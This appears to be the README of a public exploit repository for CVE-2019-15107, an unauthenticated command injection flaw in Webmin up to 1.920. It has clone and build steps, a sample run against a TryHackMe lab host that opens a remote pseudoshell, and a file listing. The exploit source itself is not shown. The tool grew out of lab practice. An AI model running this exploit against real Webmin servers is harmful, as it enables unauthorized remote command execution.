CVE-2019-15107 Webmin Exploit in C<h1 align="center">CVE-2019-15107 Webmin Exploit</h1>
<p align="center">
<a href="./LICENSE.md"><img src="https://img.shields.io/badge/License-GPL%20v2-blue.svg"></a>
<img src="https://img.shields.io/badge/Made%20With-C-green.svg"></a>
<h2>CVE-2019-15107</h2>
<p>An issue was discovered in <b>Webmin <=1.920</b>. The parameter <code>old</code> in <code>password_change.cgi</code> contains a command injection vulnerability. <a href="https://nvd.nist.gov/vuln/detail/cve-2019-15107" target="_blank"> [NVD]</a></p>
## Compiling
```bash
$ git clone https://github.com/whokilleddb/CVE-2019-15107
$ cd CVE-2019-15107
$ make
```
## Example Usage
```bash
$ ./exploit http://thomaswreath.thm:10000
[+] CVE-2019-15107 Webmin Unauhenticated Remote Command Execution
[+] Target URI: http://thomaswreath.thm:10000
======Headers======
HTTP/1.0 200 Document follows
Server: MiniServ/1.890
Date: Sat, 14 Aug 2021 23:40:01 GMT
Content-type: text/html; Charset=iso-8859-1
Connection: close
[~] The Given Server Is Running In SSL MODE
[+] Switching To SSL
[+] The Given Server Might Be Vulnerable To CVE-2019-15107
[+] The Given Server IS VULNERABLE To CVE-2019-15107
[+] Starting Pseudoshell
[+] Maximum Command Length(CMD_SIZE) Is Set To: 2048
[+] To Exit, type: exit()
```
_PS: This exploit was made while I was trying [TryHackMe's Wreath Network](https://tryhackme.com/room/wreath), hence the example show here corresponds to the box._
## F.A.Q
Q : **Why C instead of Python3?**
A : **Because I Am A Psychopath**
[4.0K] /data/pocs/95de1a1acba7911aa793b7e599016b9fb0601be0
├── [ 18K] LICENSE.GPL2
├── [ 463] Makefile
├── [1.5K] README.md
└── [4.0K] src
├── [4.0K] globals
│ ├── [ 351] structs.h
│ └── [ 238] variables.h
├── [4.0K] headers
│ ├── [4.9K] CURL.h
│ └── [3.0K] modules.h
└── [4.0K] main
└── [1.9K] main.c
4 directories, 8 files